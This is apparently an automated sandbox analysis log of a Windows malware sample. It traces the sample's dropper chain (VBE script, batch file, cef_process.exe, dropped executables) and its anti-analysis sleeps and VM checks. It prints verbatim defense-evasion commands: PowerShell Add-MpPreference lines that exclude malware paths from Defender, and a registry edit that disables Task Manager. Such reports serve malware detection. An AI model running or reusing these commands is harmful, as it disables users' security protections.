                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\vdXshwoU.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\HTmgdJna.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\CNRzgtSC.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\HOdrnIxw.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\eNXvjbiz.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeDropped PE file which has not been started: C:\Users\user\Desktop\hCXTblqe.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeDropped PE file which has not been started: C:\Users\user\Desktop\djqniAFy.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exe TID: 7724Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep count: 3282 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1264Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4128Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep count: 3614 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1424Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6492Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6048Thread sleep count: 2881 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1664Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6500Thread sleep count: 3610 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6456Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6072Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep count: 3129 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2548Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6196Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                          Source: C:\RuntimeDll\cef_process.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CBA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CBA69B
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CCC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CCC220
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CDB348 FindFirstFileExA,0_2_00CDB348
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CCE6A3 VirtualQuery,GetSystemInfo,0_2_00CCE6A3
                          Source: C:\RuntimeDll\cef_process.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\RuntimeDll\cef_process.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: wscript.exe, 00000002.00000002.1459542926.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\FUx
                          Source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2756809668.000000001B960000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeAPI call chain: ExitProcess graph end nodegraph_0-25239
                          Source: C:\RuntimeDll\cef_process.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeCode function: 8_2_00007FFAAC7436FA rdtsc 8_2_00007FFAAC7436FA
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CCF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CCF838
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CD7DEE mov eax, dword ptr fs:[00000030h]0_2_00CD7DEE
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CDC030 GetProcessHeap,0_2_00CDC030
                          Source: C:\RuntimeDll\cef_process.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CCF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CCF838
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CCF9D5 SetUnhandledExceptionFilter,0_2_00CCF9D5
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CCFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CCFBCA
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CD8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CD8EBD
                          Source: C:\RuntimeDll\cef_process.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe'
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe'
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\RuntimeDll\mOBsSQwwQhAobhYfNDABCsnt.exe'
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\lsass.exe'
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\RuntimeBroker.exe'
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe'Jump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe'Jump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\RuntimeDll\mOBsSQwwQhAobhYfNDABCsnt.exe'Jump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\lsass.exe'Jump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\RuntimeBroker.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\RuntimeDll\PBs3ExWWgPs.vbe" Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\RuntimeDll\er5JwegoF0epdZ7Hiy1grVzXqFtCRJ8c.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\RuntimeDll\cef_process.exe "C:\RuntimeDll/cef_process.exe"Jump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe'Jump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe'Jump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\RuntimeDll\mOBsSQwwQhAobhYfNDABCsnt.exe'Jump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\lsass.exe'Jump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\RuntimeBroker.exe'Jump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0MaLlOrxiN.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe "C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe"
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CCF654 cpuid 0_2_00CCF654
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00CCAF0F
                          Source: C:\RuntimeDll\cef_process.exeQueries volume information: C:\RuntimeDll\cef_process.exe VolumeInformationJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
